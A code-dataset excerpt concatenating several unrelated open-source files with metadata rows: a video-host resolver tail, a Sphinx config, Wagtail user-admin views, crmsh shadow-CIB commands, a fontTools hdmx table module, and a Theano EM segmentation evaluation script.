for i in k: post.update({i: client.parseDOM(f, 'input', ret='value', attrs = {'name': i})[0]})
post = urllib.urlencode(post)
result = client.request(url, post=post)
except:
pass
result = re.compile('(eval.*?\)\)\))').findall(result)[-1]
result = jsunpack.unpack(result)
url = client.parseDOM(result, 'embed', ret='src')
url += re.compile("file *: *[\'|\"](.+?)[\'|\"]").findall(result)
url = [i for i in url if not i.endswith('.srt')]
url = 'http://' + url[0].split('://', 1)[-1]
url += headers
return url
except:
return
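# Hedged usage sketch (the embed id below is made up, not a real stream):
#
#     stream_url = resolve('http://grifthost.com/embed-abc123xyz.html')
#
# On success this yields a direct media URL with '|User-Agent=...&Referer=...'
# appended as request headers; on failure it returns None.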
| gpl-2.0 | -3,521,125,499,870,504,000 | 32.852459 | 106 | 0.588862 | false |
pombreda/director | docs/conf.py | 1 | 5855 | # -*- coding: utf-8 -*-
#
# Director documentation build configuration file, created by
# sphinx-quickstart on Sat Sep 27 13:23:22 2008.
#
# This file is execfile()d with the current directory set to its
# containing dir.
#
# The contents of this file are pickled, so don't put values in the namespace
# that aren't pickleable (module imports are okay, they're removed
# automatically).
#
# All configuration values have a default value; values that are commented out
# serve to show the default value.
import sys
import os
# If your extensions are in another directory, add it here. If the directory
# is relative to the documentation root, use os.path.abspath to make it
# absolute, like shown here.
#sys.path.append(os.path.abspath('some/directory'))
sys.path.insert(0, os.path.abspath('../src'))
sys.path.insert(1, os.path.abspath('../tests'))
from director import __version__, __author__
# General configuration
# ---------------------
# Add any Sphinx extension module names here, as strings.
# They can be extensions
# coming with Sphinx (named 'sphinx.ext.*') or your custom ones.
extensions = ['sphinx.ext.autodoc']
# Add any paths that contain templates here, relative to this directory.
templates_path = ['.templates']
# The suffix of source filenames.
source_suffix = '.rst'
# The master toctree document.
master_doc = 'index'
# General substitutions.
project = 'Director'
copyright = "2008, %s" % __author__
# The default replacements for |version| and |release|, also used in various
# other places throughout the built documents.
#
# The short X.Y version.
version = __version__
# The full version, including alpha/beta/rc tags.
release = __version__
# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
today_fmt = '%B %d, %Y'
# List of documents that shouldn't be included in the build.
#unused_docs = []
# List of directories, relative to source directories, that shouldn't be
# searched for source files.
#exclude_dirs = []
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# Options for HTML output
# -----------------------
# The style sheet to use for HTML and HTML Help pages. A file of that name
# must exist either in Sphinx' static/ path, or in one of the custom paths
# given in html_static_path.
html_style = 'default.css'
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (within the static path) to place at the top of
# the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
#html_static_path = ['.static']
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_use_modindex = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, the reST sources are included in the HTML build as _sources/<name>.
#html_copy_source = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# If nonempty, this is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = ''
# Output file base name for HTML help builder.
htmlhelp_basename = 'Directordoc'
# Options for LaTeX output
# ------------------------
# The paper size ('letter' or 'a4').
#latex_paper_size = 'letter'
# The font size ('10pt', '11pt' or '12pt').
#latex_font_size = '10pt'
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title, author, document class
# [howto/manual]).
latex_documents = [
('index', 'Director.tex', 'Director Documentation',
__author__, 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# Additional stuff for the LaTeX preamble.
#latex_preamble = ''
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_use_modindex = True
| gpl-3.0 | -3,505,479,435,465,421,000 | 29.65445 | 79 | 0.715628 | false |
Toshakins/wagtail | wagtail/wagtailusers/views/users.py | 6 | 6214 | from __future__ import absolute_import, unicode_literals
from django.conf import settings
from django.contrib.auth import get_user_model
from django.core.exceptions import ImproperlyConfigured
from django.core.urlresolvers import reverse
from django.db.models import Q
from django.shortcuts import get_object_or_404, redirect, render
from django.utils.module_loading import import_string
from django.utils.translation import ugettext as _
from django.views.decorators.vary import vary_on_headers
from wagtail.utils.pagination import paginate
from wagtail.wagtailadmin import messages
from wagtail.wagtailadmin.forms import SearchForm
from wagtail.wagtailadmin.utils import (
any_permission_required, permission_denied, permission_required)
from wagtail.wagtailcore.compat import AUTH_USER_APP_LABEL, AUTH_USER_MODEL_NAME
from wagtail.wagtailusers.forms import UserCreationForm, UserEditForm
from wagtail.wagtailusers.utils import user_can_delete_user
User = get_user_model()
# Typically we would check the permission 'auth.change_user' (and 'auth.add_user' /
# 'auth.delete_user') for user management actions, but this may vary according to
# the AUTH_USER_MODEL setting
add_user_perm = "{0}.add_{1}".format(AUTH_USER_APP_LABEL, AUTH_USER_MODEL_NAME.lower())
change_user_perm = "{0}.change_{1}".format(AUTH_USER_APP_LABEL, AUTH_USER_MODEL_NAME.lower())
delete_user_perm = "{0}.delete_{1}".format(AUTH_USER_APP_LABEL, AUTH_USER_MODEL_NAME.lower())
def get_custom_user_form(form_setting):
try:
return import_string(getattr(settings, form_setting))
except ImportError:
raise ImproperlyConfigured(
"%s refers to a form '%s' that is not available" %
(form_setting, getattr(settings, form_setting))
)
def get_user_creation_form():
form_setting = 'WAGTAIL_USER_CREATION_FORM'
if hasattr(settings, form_setting):
return get_custom_user_form(form_setting)
else:
return UserCreationForm
def get_user_edit_form():
form_setting = 'WAGTAIL_USER_EDIT_FORM'
if hasattr(settings, form_setting):
return get_custom_user_form(form_setting)
else:
return UserEditForm
@any_permission_required(add_user_perm, change_user_perm, delete_user_perm)
@vary_on_headers('X-Requested-With')
def index(request):
q = None
is_searching = False
model_fields = [f.name for f in User._meta.get_fields()]
if 'q' in request.GET:
form = SearchForm(request.GET, placeholder=_("Search users"))
if form.is_valid():
q = form.cleaned_data['q']
is_searching = True
conditions = Q()
if 'username' in model_fields:
conditions |= Q(username__icontains=q)
if 'first_name' in model_fields:
conditions |= Q(first_name__icontains=q)
if 'last_name' in model_fields:
conditions |= Q(last_name__icontains=q)
if 'email' in model_fields:
conditions |= Q(email__icontains=q)
users = User.objects.filter(conditions)
else:
form = SearchForm(placeholder=_("Search users"))
if not is_searching:
users = User.objects.all()
if 'last_name' in model_fields and 'first_name' in model_fields:
users = users.order_by('last_name', 'first_name')
if 'ordering' in request.GET:
ordering = request.GET['ordering']
if ordering == 'username':
users = users.order_by(User.USERNAME_FIELD)
else:
ordering = 'name'
paginator, users = paginate(request, users)
if request.is_ajax():
return render(request, "wagtailusers/users/results.html", {
'users': users,
'is_searching': is_searching,
'query_string': q,
'ordering': ordering,
})
else:
return render(request, "wagtailusers/users/index.html", {
'search_form': form,
'users': users,
'is_searching': is_searching,
'ordering': ordering,
'query_string': q,
})
@permission_required(add_user_perm)
def create(request):
if request.method == 'POST':
form = get_user_creation_form()(request.POST, request.FILES)
if form.is_valid():
user = form.save()
messages.success(request, _("User '{0}' created.").format(user), buttons=[
messages.button(reverse('wagtailusers_users:edit', args=(user.pk,)), _('Edit'))
])
return redirect('wagtailusers_users:index')
else:
messages.error(request, _("The user could not be created due to errors."))
else:
form = get_user_creation_form()()
return render(request, 'wagtailusers/users/create.html', {
'form': form,
})
@permission_required(change_user_perm)
def edit(request, user_id):
user = get_object_or_404(User, pk=user_id)
can_delete = user_can_delete_user(request.user, user)
if request.method == 'POST':
form = get_user_edit_form()(request.POST, request.FILES, instance=user)
if form.is_valid():
user = form.save()
messages.success(request, _("User '{0}' updated.").format(user), buttons=[
messages.button(reverse('wagtailusers_users:edit', args=(user.pk,)), _('Edit'))
])
return redirect('wagtailusers_users:index')
else:
messages.error(request, _("The user could not be saved due to errors."))
else:
form = get_user_edit_form()(instance=user)
return render(request, 'wagtailusers/users/edit.html', {
'user': user,
'form': form,
'can_delete': can_delete,
})
@permission_required(delete_user_perm)
def delete(request, user_id):
user = get_object_or_404(User, pk=user_id)
if not user_can_delete_user(request.user, user):
return permission_denied(request)
if request.method == 'POST':
user.delete()
messages.success(request, _("User '{0}' deleted.").format(user))
return redirect('wagtailusers_users:index')
return render(request, "wagtailusers/users/confirm_delete.html", {
'user': user,
})
| bsd-3-clause | 3,845,206,048,990,028,000 | 33.331492 | 95 | 0.638236 | false |
ingted/crmsh | modules/ui_cib.py | 1 | 8787 | # Copyright (C) 2008-2011 Dejan Muhamedagic <[email protected]>
# Copyright (C) 2013 Kristoffer Gronlund <[email protected]>
# See COPYING for license information.
import os
import glob
from . import command
from . import xmlutil
from . import utils
from . import ui_cibstatus
from . import constants
from . import config
from . import options
from .msg import no_prog_err
from .cibstatus import cib_status
from .cibconfig import cib_factory
from . import tmpfiles
from . import completers as compl
_NEWARGS = ('force', '--force', 'withstatus', 'empty')
class CibShadow(command.UI):
'''
CIB shadow management class
'''
name = "cib"
extcmd = ">/dev/null </dev/null crm_shadow -b"
extcmd_stdout = "</dev/null crm_shadow -b"
def requires(self):
if not utils.is_program('crm_shadow'):
no_prog_err('crm_shadow')
return False
return True
@command.level(ui_cibstatus.CibStatusUI)
def do_cibstatus(self):
pass
@command.skill_level('administrator')
@command.completers_repeating(compl.null, compl.choice(_NEWARGS))
def do_new(self, context, *args):
"usage: new [<shadow_cib>] [withstatus] [force] [empty]"
argl = list(args)
opt_l = utils.fetch_opts(argl, ["force", "--force", "withstatus", "empty"])
if len(argl) > 1:
context.fatal_error("Unexpected argument(s): " + ' '.join(argl))
name = None
if argl:
name = argl[0]
if not utils.is_filename_sane(name):
context.fatal_error("Bad filename: " + name)
if name in (constants.tmp_cib_prompt, constants.live_cib_prompt):
context.fatal_error("Shadow name '%s' is not allowed" % (name))
del argl[0]
constants.tmp_cib = False
else:
fd, fname = tmpfiles.create(dir=xmlutil.cib_shadow_dir(), prefix="shadow.crmsh_")
name = os.path.basename(fname).replace("shadow.", "")
constants.tmp_cib = True
if "empty" in opt_l:
new_cmd = "%s -e '%s'" % (self.extcmd, name)
else:
new_cmd = "%s -c '%s'" % (self.extcmd, name)
if constants.tmp_cib or config.core.force or "force" in opt_l or "--force" in opt_l:
new_cmd = "%s --force" % new_cmd
if utils.ext_cmd(new_cmd) == 0:
context.info("%s shadow CIB created" % name)
self.do_use(context, name)
if "withstatus" in opt_l:
cib_status.load("shadow:%s" % name)
def _find_pe(self, context, infile):
'Find a pe input'
for p in ("%s/%s", "%s/%s.bz2", "%s/pe-*-%s.bz2"):
fl = glob.glob(p % (config.path.pe_state_dir, infile))
if fl:
break
if not fl:
context.fatal_error("no %s pe input file" % infile)
if len(fl) > 1:
context.fatal_error("more than one %s pe input file: %s" %
(infile, ' '.join(fl)))
if not fl[0]:
context.fatal_error("bad %s pe input file" % infile)
return fl[0]
@command.skill_level('administrator')
@command.completers(compl.null, compl.shadows)
def do_import(self, context, infile, name=None):
"usage: import {<file>|<number>} [<shadow>]"
if name and not utils.is_filename_sane(name):
context.fatal_error("Bad filename: " + name)
# where's the input?
if not os.access(infile, os.F_OK):
if "/" in infile:
context.fatal_error(str(infile) + ": no such file")
infile = self._find_pe(context, infile)
if not name:
name = os.path.basename(infile).replace(".bz2", "")
if not xmlutil.pe2shadow(infile, name):
context.fatal_error("Error copying PE file to shadow: %s -> %s" % (infile, name))
# use the shadow and load the status from there
return self.do_use(context, name, "withstatus")
@command.skill_level('administrator')
@command.completers(compl.shadows)
def do_delete(self, context, name):
"usage: delete <shadow_cib>"
if not utils.is_filename_sane(name):
context.fatal_error("Bad filename: " + name)
if utils.get_cib_in_use() == name:
context.fatal_error("%s shadow CIB is in use" % name)
if utils.ext_cmd("%s -D '%s' --force" % (self.extcmd, name)) == 0:
context.info("%s shadow CIB deleted" % name)
else:
context.fatal_error("failed to delete %s shadow CIB" % name)
@command.skill_level('administrator')
@command.completers(compl.shadows)
def do_reset(self, context, name):
"usage: reset <shadow_cib>"
if not utils.is_filename_sane(name):
context.fatal_error("Bad filename: " + name)
if utils.ext_cmd("%s -r '%s'" % (self.extcmd, name)) == 0:
context.info("copied live CIB to %s" % name)
else:
context.fatal_error("failed to copy live CIB to %s" % name)
@command.skill_level('administrator')
@command.wait
@command.completers(compl.shadows)
def do_commit(self, context, name=None):
"usage: commit [<shadow_cib>]"
if name and not utils.is_filename_sane(name):
context.fatal_error("Bad filename: " + name)
if not name:
name = utils.get_cib_in_use()
if not name:
context.fatal_error("There is nothing to commit")
if utils.ext_cmd("%s -C '%s' --force" % (self.extcmd, name)) == 0:
context.info("committed '%s' shadow CIB to the cluster" % name)
else:
context.fatal_error("failed to commit the %s shadow CIB" % name)
if constants.tmp_cib:
self._use('', '')
@command.skill_level('administrator')
def do_diff(self, context):
"usage: diff"
rc, s = utils.get_stdout(utils.add_sudo("%s -d" % self.extcmd_stdout))
utils.page_string(s)
@command.skill_level('administrator')
def do_list(self, context):
"usage: list"
if options.regression_tests:
for t in xmlutil.listshadows():
print t
else:
utils.multicolumn(xmlutil.listshadows())
def _use(self, name, withstatus):
# Choose a shadow cib for further changes. If the name
# provided is empty, then choose the live (cluster) cib.
# Don't allow ' in shadow names
if not name or name == "live":
if withstatus:
cib_status.load("live")
if constants.tmp_cib:
utils.ext_cmd("%s -D '%s' --force" % (self.extcmd, utils.get_cib_in_use()))
constants.tmp_cib = False
utils.clear_cib_in_use()
else:
utils.set_cib_in_use(name)
if withstatus:
cib_status.load("shadow:%s" % name)
return True
@command.skill_level('administrator')
@command.completers(compl.join(compl.shadows, compl.choice(['live'])),
compl.choice(['withstatus']))
def do_use(self, context, name='', withstatus=''):
"usage: use [<shadow_cib>] [withstatus]"
# check the name argument
if name and not utils.is_filename_sane(name):
context.fatal_error("Bad filename: " + name)
if name and name != "live":
if not os.access(xmlutil.shadowfile(name), os.F_OK):
context.fatal_error("%s: no such shadow CIB" % name)
if withstatus and withstatus != "withstatus":
context.fatal_error("Expected 'withstatus', got '%s'" % (withstatus))
# If invoked from configure
# take special precautions
if not context.previous_level_is("cibconfig"):
return self._use(name, withstatus)
if not cib_factory.has_cib_changed():
ret = self._use(name, withstatus)
# new CIB: refresh the CIB factory
cib_factory.refresh()
return ret
saved_cib = utils.get_cib_in_use()
self._use(name, '') # don't load the status yet
if not cib_factory.is_current_cib_equal(silent=True):
# user made changes and now wants to switch to a
# different and unequal CIB; we refuse to cooperate
context.error_message("the requested CIB is different from the current one")
if config.core.force:
context.info("CIB overwrite forced")
elif not utils.ask("All changes will be dropped. Do you want to proceed?"):
self._use(saved_cib, '') # revert to the previous CIB
return False
return self._use(name, withstatus) # now load the status too
# vim:ts=4:sw=4:et:
| gpl-2.0 | 1,797,367,856,346,419,000 | 38.940909 | 93 | 0.57255 | false |
googlei18n/TachyFont | run_time/src/gae_server/third_party/old-fonttools-master/Lib/fontTools/ttLib/tables/_h_d_m_x.py | 11 | 3008 | from __future__ import print_function, division, absolute_import
from fontTools.misc.py23 import *
from fontTools.misc import sstruct
from . import DefaultTable
hdmxHeaderFormat = """
> # big endian!
version: H
numRecords: H
recordSize: l
"""
class table__h_d_m_x(DefaultTable.DefaultTable):
def decompile(self, data, ttFont):
numGlyphs = ttFont['maxp'].numGlyphs
glyphOrder = ttFont.getGlyphOrder()
dummy, data = sstruct.unpack2(hdmxHeaderFormat, data, self)
self.hdmx = {}
for i in range(self.numRecords):
ppem = byteord(data[0])
maxSize = byteord(data[1])
widths = {}
for glyphID in range(numGlyphs):
widths[glyphOrder[glyphID]] = byteord(data[glyphID+2])
self.hdmx[ppem] = widths
data = data[self.recordSize:]
assert len(data) == 0, "too much hdmx data"
def compile(self, ttFont):
self.version = 0
numGlyphs = ttFont['maxp'].numGlyphs
glyphOrder = ttFont.getGlyphOrder()
self.recordSize = 4 * ((2 + numGlyphs + 3) // 4)
pad = (self.recordSize - 2 - numGlyphs) * b"\0"
self.numRecords = len(self.hdmx)
data = sstruct.pack(hdmxHeaderFormat, self)
items = sorted(self.hdmx.items())
for ppem, widths in items:
data = data + bytechr(ppem) + bytechr(max(widths.values()))
for glyphID in range(len(glyphOrder)):
width = widths[glyphOrder[glyphID]]
data = data + bytechr(width)
data = data + pad
return data
def toXML(self, writer, ttFont):
writer.begintag("hdmxData")
writer.newline()
ppems = sorted(self.hdmx.keys())
records = []
format = ""
for ppem in ppems:
widths = self.hdmx[ppem]
records.append(widths)
format = format + "%4d"
glyphNames = ttFont.getGlyphOrder()[:]
glyphNames.sort()
maxNameLen = max(map(len, glyphNames))
format = "%" + repr(maxNameLen) + 's:' + format + ' ;'
writer.write(format % (("ppem",) + tuple(ppems)))
writer.newline()
writer.newline()
for glyphName in glyphNames:
row = []
for ppem in ppems:
widths = self.hdmx[ppem]
row.append(widths[glyphName])
if ";" in glyphName:
glyphName = "\\x3b".join(glyphName.split(";"))
writer.write(format % ((glyphName,) + tuple(row)))
writer.newline()
writer.endtag("hdmxData")
writer.newline()
def fromXML(self, name, attrs, content, ttFont):
if name != "hdmxData":
return
content = strjoin(content)
lines = content.split(";")
topRow = lines[0].split()
assert topRow[0] == "ppem:", "illegal hdmx format"
ppems = list(map(int, topRow[1:]))
self.hdmx = hdmx = {}
for ppem in ppems:
hdmx[ppem] = {}
lines = (line.split() for line in lines[1:])
for line in lines:
if not line:
continue
assert line[0][-1] == ":", "illegal hdmx format"
glyphName = line[0][:-1]
if "\\" in glyphName:
from fontTools.misc.textTools import safeEval
glyphName = safeEval('"""' + glyphName + '"""')
line = list(map(int, line[1:]))
assert len(line) == len(ppems), "illegal hdmx format"
for i in range(len(ppems)):
hdmx[ppems[i]][glyphName] = line[i]
| apache-2.0 | -7,661,074,452,810,834,000 | 29.08 | 64 | 0.651263 | false |
openconnectome/ndod | maca/packages/theano_membrane_segmentation/em_evaluate.py | 5 | 13425 | ################################################################################
# (c) [2013] The Johns Hopkins University / Applied Physics Laboratory All Rights Reserved.
# Contact the JHU/APL Office of Technology Transfer for any additional rights. www.jhuapl.edu/ott
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
################################################################################
""" Evaluates an previously trained CNN on a data set.
"""
import os, os.path
import sys, time
import argparse
import numpy
from scipy import ndimage
import h5py
import em_networks as EMN
from em_utils import *
from tiles import *
def evaluate_network(nn, X, pp_func, selectedPixels, lowerPixels, upperPixels, outDir="."):
"""
    Runs a (previously trained) neural network against the test data set X.
    Now called as: evaluate_network(nn, X, pp_func_curried, selectedPixels, lowerPixels, upperPixels, outDir=args.outDir)
    (previously: evaluate_network(nn, X, pp_func, lbX=float('-Inf'), ubX=float('Inf'), outDir="."))
"""
tileSize = nn.p
border = numpy.floor(tileSize/2.)
X = mirror_edges_tensor(X, border)
Y = numpy.zeros(X.shape) # we do not have labels for test data
# create a tile manager
testMgr = TileManager(X, Y, tileSize=tileSize)
nTestBatches = int(numpy.ceil(testMgr.batchSize / nn.miniBatchSize))
# set up Theano
print '[em_evaluate]: initializing Theano (using device %s)...' % theano.config.device
index = T.lscalar()
# note: I threw away the nn.y parameter - I think it is unnecessary and actually
# causes problems in newer versions of Theano.
predict_test_data = theano.function([index], nn.layers[-1].p_y_given_x,
givens={
nn.x: testMgr.X_batch_GPU[index*nn.miniBatchSize:(index+1)*nn.miniBatchSize]})
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# evaluation phase
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
print '[em_evaluate]: beginning evaluation (using device %s)...' % theano.config.device
Y_hat = numpy.zeros(X.shape)
cnt = 0
startTime = time.clock()
#for slices,rows,cols in testMgr.make_all_pixel_generator():
#for slices,rows,cols in testMgr.make_bandpass_pixel_generator(lbX, ubX):
for slices,rows,cols in testMgr.make_selected_pixel_generator(selectedPixels):
# update tiles on the GPU
testMgr.update_gpu(slices,rows,cols,flipDim=0,rotDir=0)
for ii in range(nTestBatches):
# predictions is a (nTiles x 2) matrix
# grab the second output (y=1)
# (i.e. we store probability of membrane)
pMembrane = predict_test_data(ii)[:,1]
# Be careful - on the last iteration, there may be
# less than batchSize tiles remaining.
a = ii*nn.miniBatchSize
b = min((ii+1)*nn.miniBatchSize, len(slices))
if a > len(slices): break
Y_hat[slices[a:b], rows[a:b], cols[a:b]] = pMembrane[0:b-a]
# report status every so often
cnt += 1
if numpy.mod(cnt,10)==1:
print '[em_evaluate]: last processed (%d, %d, %d). Net time: %0.2f m' % (slices[-1], rows[-1], cols[-1], (time.clock()-startTime)/60.)
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# postprocessing
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# discard the border (optional)
if True:
p2 = int(numpy.floor(tileSize/2.0))
X = X[:, p2:-p2, p2:-p2]
Y_hat = Y_hat[:, p2:-p2, p2:-p2]
print '[em_evaluate]: postprocessing...'
Y_hat = pp_func(X, Y_hat)
# apply "bandpass" classification values
#Y_hat[X < lbX] = 0
#Y_hat[X > ubX] = 0
Y_hat[lowerPixels] = 1 # we actually made the classifier classify nonmembrane, so these pixels have probability 1 of being nonmembrane. (A temporary fix for now)
Y_hat[upperPixels] = 1
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
# save results
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
print '[em_evaluate]: done processing. saving results...'
# numpy output
numpy.savez(os.path.join(outDir, 'test-results'), X=X, Y_hat=Y_hat, P=selectedPixels)
# hdf5 output
f5 = h5py.File(os.path.join(outDir, 'test-results.hdf5'), 'w')
f5.create_dataset('Y_hat', data=Y_hat)
# also save as a .tif Unfortunately, it doesn't appear that
# PIL has a good way of *creating* a multi-page tif. So we'll
# save each slice independently and rely on some outside tool
# to merge them together (or leave them as separate files).
for sliceId in range(X.shape[0]):
X_i = X[sliceId,:,:]
Y_hat_i = Y_hat[sliceId,:,:]
# The ISBI conference wants the cube to represent probability
# of non-membrane, so invert the probabilities before saving.
fn = os.path.join(outDir, 'test_slice%02d_Yhat.tif' % sliceId)
save_tiff_data(1.0 - Y_hat_i, fn)
# Save a copy of the input data as well.
fn = os.path.join(outDir, 'test_slice%02d_X.tif' % sliceId)
save_tiff_data(X_i, fn, rescale=True)
return Y_hat
def postprocess(X, Y_hat, cubicCoeffs=[]):
Y_hatC = numpy.zeros(Y_hat.shape)
# TODO: a better estimate for these coefficients
#
# NOTE: these were derived for ISBI 2012. You'll need to
# re-derive these for other data sets.
#coeffs = [1.133, -0.843, 0.707]
for ii in range(Y_hat.shape[0]):
Yi = Y_hat[ii,:,:]
# calibrate
if len(cubicCoeffs) == 3:
print '[em_evaluate]: performing cubic calibration'
#Y_hatC[ii,:,:] = (Yi**3)*cubicCoeffs[0] + (Yi**2)*cubicCoeffs[1] + Yi*cubicCoeffs[2]
Y_hatC[ii,:,:] = numpy.minimum(1,(Yi**3)*cubicCoeffs[0] + (Yi**2)*cubicCoeffs[1] + Yi*cubicCoeffs[2])
Y_hatC[ii,:,:] = numpy.maximum(0,Y_hatC[ii,:,:])
else:
print '[em_evaluate]: omitting cubic calibration'
Y_hatC[ii,:,:] = Yi
# median filter
# Y_hatC[ii,:,:] = median_filter(Y_hatC[ii,:,:],r=4)
        # Aurora removed the median filtering; Dean and Will asked to apply it themselves, so we only perform the coefficient calibration here.
return Y_hatC
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
if __name__ == '__main__':
#~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
parser = argparse.ArgumentParser('Evaluate a neural network on an EM data set')
parser.add_argument('-n', dest='network', type=str, default='LeNetMembraneN3',
help='neural network architecture')
parser.add_argument('-X', dest='volumeFileName', type=str,
default=os.path.join('..', '..', 'Data', 'EM_2012', 'test-volume.tif'),
help='the data to evaluate')
parser.add_argument('-Y', dest='labelsFileName', type=str, default=None,
help='ground truth labels (optional)')
parser.add_argument('--eval-slices', dest='evalSliceExpr', type=str, default='',
help='A python-evaluatable string indicating which slices should be used for validation (or empty string to evaluate the whole stack)')
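    # For example (illustrative values): --eval-slices "range(0, 5)" or "[0, 3, 7]".
    # The string is passed to eval() below and the result is used to index the
    # volume stack, i.e. X = X[evalSlices].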
parser.add_argument('-p', dest='paramFileName', type=str, default='params_epoch001.npz',
help='the neural network parameters to load')
parser.add_argument('-o', dest='outDir', type=str, default='.',
help='output directory')
# preprocessing arguments
parser.add_argument('--normalizeinputs', dest='normalizeinputs', type=bool, default=True,
                        help='if True, the input volume X is renormalized before evaluation (default: True)')
parser.add_argument('--intensity-lower-bound', dest='xLowerBound', type=float, default=float('-Inf'),
help='membrane pixel intensities less than this bound have membrane probability 0')
parser.add_argument('--intensity-upper-bound', dest='xUpperBound', type=float, default=float('Inf'),
help='membrane pixel intensities greater than this bound have membrane probability 0')
parser.add_argument('--thresh-dilation-kernel', dest='threshDilationKernel', type=int, default=0,
help='size of selected pixel dilation kernel (or 0 for no dilation)')
parser.add_argument('--thresh-erosion-kernel', dest='threshErosionKernel', type=int, default=0,
help='size of selected pixel erosion kernel (or 0 for no erosion)')
# postprocessing arguments
parser.add_argument('--cubic-coeffs', dest='cubicCoeffs', type=str, default="[]",
help='coefficients to use with cubic postprocessing (or [] for none)')
args = parser.parse_args()
args.cubicCoeffs = eval(args.cubicCoeffs)
# create a neural network instance
clazz = getattr(EMN, args.network)
nn = clazz()
print '[em_evaluate]: Using the following parameters:'
print ' network: %s' % nn.__class__.__name__
for key, value in vars(args).iteritems():
print ' %s: %s' % (key, value)
print '\n'
# load the volume
if args.volumeFileName.endswith('.tif'):
X = load_tiff_data(args.volumeFileName)
elif args.volumeFileName.endswith('.npz'):
# assumes volume data is stored as the tensor X
X = numpy.load(args.volumeFileName)['X']
else:
raise RuntimeError('unexpected data file extension')
# pare down to set of slices that are of interest (optional)
if len(args.evalSliceExpr):
evalSlices = eval(args.evalSliceExpr)
X = X[evalSlices]
# preprocessing. This includes volume normalization (optional) and thresholding (optional)
selectedPixels = numpy.logical_and(args.xLowerBound <= X, X <= args.xUpperBound)
# Note: I observed strange behavior when running the erosion
# operator on the entire tensor in a single call. So for now,
# I'll do this a slice at a time until I can figure out what the
# situation is with the tensor.
if args.threshDilationKernel > 0:
kernel = ndimage.generate_binary_structure(2,1)
kernel = ndimage.iterate_structure(kernel, args.threshDilationKernel).astype(int)
for ii in range(selectedPixels.shape[0]):
selectedPixels[ii,:,:] = ndimage.binary_dilation(selectedPixels[ii,:,:], structure=kernel, iterations=1)
else:
print '[em_evaluate]: no threshold dilation will be applied'
if args.threshErosionKernel > 0:
kernel = ndimage.generate_binary_structure(2,1)
kernel = ndimage.iterate_structure(kernel, args.threshErosionKernel).astype(int)
for ii in range(selectedPixels.shape[0]):
selectedPixels[ii,:,:] = ndimage.binary_erosion(selectedPixels[ii,:,:], structure=kernel, iterations=1)
else:
print '[em_evaluate]: no threshold erosion will be applied'
lowerPixels = numpy.logical_and(numpy.logical_not(selectedPixels), X < args.xLowerBound)
upperPixels = numpy.logical_and(numpy.logical_not(selectedPixels), X > args.xUpperBound)
if args.normalizeinputs :
for ii in range(X.shape[0]):
X[ii,:,:] = X[ii,:,:] - numpy.mean(X[ii,:,:])
X = X / numpy.max(numpy.abs(X))
print ' volume dim: %d x %d x %d' % (X.shape[0], X.shape[1], X.shape[2])
print ' volume min/max: %0.2f %0.2f' % (numpy.min(X), numpy.max(X))
print ' # pixels to eval: %d' % numpy.sum(selectedPixels)
print ''
if not os.path.exists(args.outDir): os.makedirs(args.outDir)
# load the parameters and run it
EMN.load_network_parameters(nn, args.paramFileName)
pp_func_curried = lambda X, Yhat: postprocess(X, Yhat, args.cubicCoeffs)
#Y_hat = evaluate_network(nn, X, pp_func_curried, outDir=args.outDir, lbX=args.xLowerBound, ubX=args.xUpperBound)
